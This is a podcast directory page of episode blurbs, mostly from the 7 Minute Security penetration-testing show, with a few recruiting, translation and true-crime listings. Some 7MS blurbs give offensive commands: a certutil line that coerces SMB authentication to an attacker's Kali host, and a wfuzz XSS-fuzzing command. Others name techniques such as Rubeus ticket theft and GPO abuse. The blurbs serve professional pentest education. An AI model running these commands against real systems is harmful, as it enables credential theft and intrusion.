Host Justin Musil, nationally renowned baseball and recruiting and scouting guru, unlocks the secrets of college baseball recruiting. Justin has worked with hundreds of players through the recruiting process and is one of the most connected individuals in all of college baseball. This one of a kind podcast provides unique insight and never before heard analysis with all things college baseball recruiting. This is Baseball Recruiting Confidential.
…
continue reading
7 Minute Security is a weekly information security podcast focusing on penetration testing, blue teaming and building a career in security. The podcast also features in-depth interviews with industry leaders who share their insights, tools, tips and tricks for being a successful security engineer.
…
continue reading
CROOKED RIVER is a fictional podcast narrative that spans the five-year period between September 1934 and August 1939 in post-Prohibition Cleveland, Ohio at the height of the Great Depression. During this politically turbulent time, an elusive killer decapitated and dismembered thirteen victims—seven men and six women—all under the watch of newly appointed Public Safety Director Eliot Ness, the famed G-man from Al Capone’s Chicago glory days. The disturbing crimes, the setting, and the perip ...
…
continue reading
Welcome to Meet the Translator! I'm Dot Roberts and I chat with a different translator each episode, getting to know them, hearing their story and covering various topics related to translation. Whether you are new to the translation industry, an experienced translator or just curious about the subject, join me as we delve into different areas of translation and learn more about our wonderful colleagues.
…
continue reading
Artificial hype alert! I’m working on a NEW version of BPATTY (Brian’s Pentesting and Technical Tips for You), but it is delayed because of a weird domain name hostage negotiation situation. It’s weird. But in the meantime I want to talk about the project (which is a pentest documentation library built on Docusaurus) and how I think it will be bigg…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #635: Eating the Security Dog Food - Part 7
45:26
45:26
Play later
Play later
Lists
Like
Liked
45:26
Today we’re talking about eating the security dog food – specifically: Satisfying critical security control #1 Using the Atlassian family of tools to create a ticketing/change control system and wrap it into an asset inventory Leveraging Wazuh as a security monitoring system (with eventual plans to leverage its API to feed Atlassian inventory data)…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #634: Tales of Pentest Pwnage - Part 60
32:38
32:38
Play later
Play later
Lists
Like
Liked
32:38
Hi, today’s tale of pentest pwnage covers a few wins and one loss: A cool opportunity to drop Farmer “crops” to a domain admin’s desktop folder via PowerShell remote session Finding super sensitive data by dumpster-diving into a stale C:\Users\Domain-Admin profile Finding a vCenter database backup and being unable to pwn it using vcenter_saml_login…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #633: How to Create a Security Knowledgebase with Docusaurus
14:16
14:16
Play later
Play later
Lists
Like
Liked
14:16
Hey friends, we’re doing a little departure from our normal topics and focusing on how to create a security knowledgebase (is that one word or two?) using Docusaurus! It’s cool, it’s free, it’s from Meta and you can get up and going in just a few commands – check out their getting started guide to get rockin’ in about 5 minutes. Important files inc…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #632: Tales of Pentest Pwnage – Part 59
48:09
48:09
Play later
Play later
Lists
Like
Liked
48:09
Today’s tale of pentest pwnage includes some fun stuff, including: SharpGPOAbuse helps abuse vulnerable GPOs! Try submitting a harmless POC first via a scheduled task – like ping -n 1 your.kali.ip.address. When you’re ready to fire off a task that coerces SMB auth, try certutil -syncwithWU \\your.kali.ip.address\arbitrary-folder. I’m not 100% sure …
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #631: Tales of Pentest Pwnage – Part 58
15:57
15:57
Play later
Play later
Lists
Like
Liked
15:57
Hi friends, today’s a tale full of test tips and tools to help you in your adventures in pentesting! SCCM Exploitation SCCM Exploitation: The First Cred Is the Deepest II w/ Gabriel Prud’homme – fantastic resource for learning all about attacking SCCM – starting from a perspective of zero creds CMLoot – find interesting files stored on (System Cent…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #630: Epic Road Trip Served with Security Sprinkles
45:27
45:27
Play later
Play later
Lists
Like
Liked
45:27
Today I recap a two week persona/biz road trip and talk about the security stuff that got sprinkled into it, including: Family members who don’t care about their personal security Weakpass – a cool collection of word lists for brute-forcing and spraying that I’d never heard of Working on two security Webinars for Netwrix (here’s part 1: Mastering P…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #629: Interview with Stu Musil of Ambient Consulting
46:23
46:23
Play later
Play later
Lists
Like
Liked
46:23
Today we have a fun featured interview with my new friend Stu Musil of Ambient Consulting I had a great time talking with Stu about bashing come common misconceptions people have about working with recruiters, plus tackling some frequently asked questions: How do you properly vet a recruiter you don’t know, but who offers a job opportunity you’re i…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #628: How to Succeed in Business Without Really Crying – Part 17
9:36
9:36
Play later
Play later
Lists
Like
Liked
9:36
Hey friends, today we talk about some not-so-glamorous but ever-so-important stuff related to running a cybersecurity consultancy, including: Taking an inventory of all the SaaS stuff your business uses – to keep an eye on spending, know when services are expiring, and track which credit card the services are tied to (so the services don’t almost g…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #627: Migrating from vCenter to Proxmox – Part 2
35:36
35:36
Play later
Play later
Lists
Like
Liked
35:36
Hey friends, today we continue our series all about migrating from VMWare to the world Proxmox! Specifically: Getting my first Proxmox-based NUCs out in the field for live engagements! Pulling the trigger on two bare-metal Proxmox servers to eventually replace my vCenter environment. OVHCloud made it super easy to to add Proxmox to those bare-metal…
…
continue reading
Hey friends, today we’ve got a security milkshake episode about Web app pentesting. Specifically we talk about: Burp Suite Enterprise Caido – a lightweight alternative to Burp wfuzz – Web fuzzer. Using a proxy:wfuzz -c -z file,/usr/share/wfuzz/wordlist/Injections/XSS.txt –sc 200 “https://somedomain.com/shopping?&qty=%2FUZZ” -p 10.0.7.11:8080 KNOXSS…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #625: A Peek into the 7MS Mail Bag - Part 4
44:00
44:00
Play later
Play later
Lists
Like
Liked
44:00
Road trip time! I’ve been traveling this week doing some fun security projects, and thought all this highway time would be a perfect opportunity to take a dip into the 7MS mail bag! Today’s questions include: How do you price internal network penetration tests? Have you ever had to deal with a difficult client situation, and how did you resolve it?…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #624: Tales of Pentest Pwnage – Part 57
29:04
29:04
Play later
Play later
Lists
Like
Liked
29:04
Today’s tale of pentest pwnage is all about my new favorite attack called SPN-less RBCD. We did a teaser episode last week that actually ended up being a full episode all about the attack, and even step by step commands to pull it off. But I didn’t want today’s episode to just be “Hey friends, check out the YouTube version of this attack!” so I als…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #623: Prelude to a Tale of Pentest Pwnage
24:52
24:52
Play later
Play later
Lists
Like
Liked
24:52
Today’s prelude to a tale of pentest pwnage talks about something called “spnless RBCD” (resource-based constrained delegation). The show notes don't format well here in the podcast notes, so head to 7minsec.com to see the notes in all their glory.
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #622: Migrating from vCenter to Proxmox - Part 1
16:31
16:31
Play later
Play later
Lists
Like
Liked
16:31
Sadly, the Broadcom acquisition of VMWare has hit 7MinSec hard – we love running ESXi on our NUCs, but ESXi free is no longer available. To add insult to injury, our vCenter lab at OVHcloud HQ got a huge price gouge (due to license cost increase; not OVH’s fault). Now we’re exploring Proxmox as an alternative hypervisor, so we’re using today’s epis…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #621: Eating the Security Dog Food - Part 6
23:37
23:37
Play later
Play later
Lists
Like
Liked
23:37
Today we revisit a series about eating the security dog food – in other words, practicing what we preach as security gurus! Specifically we talk about: We’re going to get a third-party assessment on 7MinSec (the business) Tips for secure email backup/storage Limiting the retention of sensitive data you store in cloud places…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #620: Securing Your Mental Health - Part 5
22:54
22:54
Play later
Play later
Lists
Like
Liked
22:54
Today we’re talking about tips to deal with stress and anxiety: It sounds basic, but take breaks – and take them in a different place (don’t just stay in the office and do more screen/doom-scrolling) I’ve never gotten to a place in my workload where I go “Ahhh, all caught up!” so I should stop striving to hit that invisible goal. Chiropractic and b…
…
continue reading
We did something crazy today and recorded an episode that was 7 minutes long! Today we talk about some things that have helped us out in recent pentests: When using Farmer to create “trap” files that coerce authentication, I’ve found way better results using Windows Search Connectors (.searchConnector-ms) files This matrix of “can I relay this to t…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
Being a Content Creator in the Translation Industry with Adrian Probst and Kelsey Frick
1:17:34
1:17:34
Play later
Play later
Lists
Like
Liked
1:17:34
Welcome back to the Meet the Translator podcast! ✨ I'm joined by YouTube sensation Adrian Probst and LinkedInfluencer star Kelsey Frick for an episode all about being a content creator in the translation industry. Listen along to find out what Kelsey and Adrian do, where they find their inspiration, and how being a content creator benefits their fr…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #618: Writing Savage Pentest Reports with Sysreptor
38:30
38:30
Play later
Play later
Lists
Like
Liked
38:30
Today’s episode is all about writing reports in Sysreptor. It’s awesome! Main takeaways: The price is free (they have a paid version as well)! You can send findings and artifacts directly to the report server using the reptor Python module Warning: Sysreptor only exports to PDF (no Word version option!) Sysreptor has helped us write reports faster …
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #617: Tales of Pentest Pwnage – Part 55
36:19
36:19
Play later
Play later
Lists
Like
Liked
36:19
Hey friends, today we’ve got a tale of pentest pwnage that covers: Passwords – make sure to look for patterns such as keyboard walks, as well as people who are picking passwords where the month the password changed is part of the password (say that five times fast)! Making sure you go after cached credentials Attacking SCCM – Misconfiguration Manag…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
Translating Your Grandfather's Literature with Roberto Van Eyken
39:29
39:29
Play later
Play later
Lists
Like
Liked
39:29
In this episode of the Meet the Translator podcast, I'm joined by Roberto Van Eyken, a translator who has had the unique opportunity to translate his own grandfather's literature. Listen along to find out about Roberto's path into translation and what it's like to translate something with such a personal and emotional aspect to it. We chat about th…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #616: Interview with Andrew Morris of GreyNoise
59:04
59:04
Play later
Play later
Lists
Like
Liked
59:04
Hey friends, today we have a super fun interview with Andrew Morris of GreyNoise to share. Andrew chatted with us about: Young Andrew’s early adventures in hacking his school’s infrastructure (note: don’t try this at home, kids!) Meeting a pentester for the first time, and getting his first pentesting job Spinning up a box on the internet, having i…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #615: Tales of Pentest Pwnage – Part 54
21:48
21:48
Play later
Play later
Lists
Like
Liked
21:48
Hey friends, sorry I’m so late with this (er, last) week’s episode but I’m back! Today is more of a prep for tales of pentest pwnage, but topics covered include: Make sure when you’re snafflin‘ that you check for encrypted/obfuscated logins and login strings – it might not be too tough to decrypt them! On the defensive side, I’ve found myself getti…
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #614: How to Succeed in Business Without Really Crying - Part 16
36:21
36:21
Play later
Play later
Lists
Like
Liked
36:21
How much fun I had attending and speaking at Netwrix Connect Being a sales guy in conference situations without being an annoying sales guy in conference situations A recap of the talk I co-presented about high profile breaches and lessons we can learn from them
…
continue reading
![Artwork](/static/images/128pixel.png)
1
7MS #613: Tales of Pentest Pwnage – Part 53
33:24
33:24
Play later
Play later
Lists
Like
Liked
33:24
Today’s tale of pentest covers: Farming for credentials (don’t forget to understand trusted zones to make this happen properly!) Snaffling for juice file shares Stealing Kerberos tickets with Rubeus
…
continue reading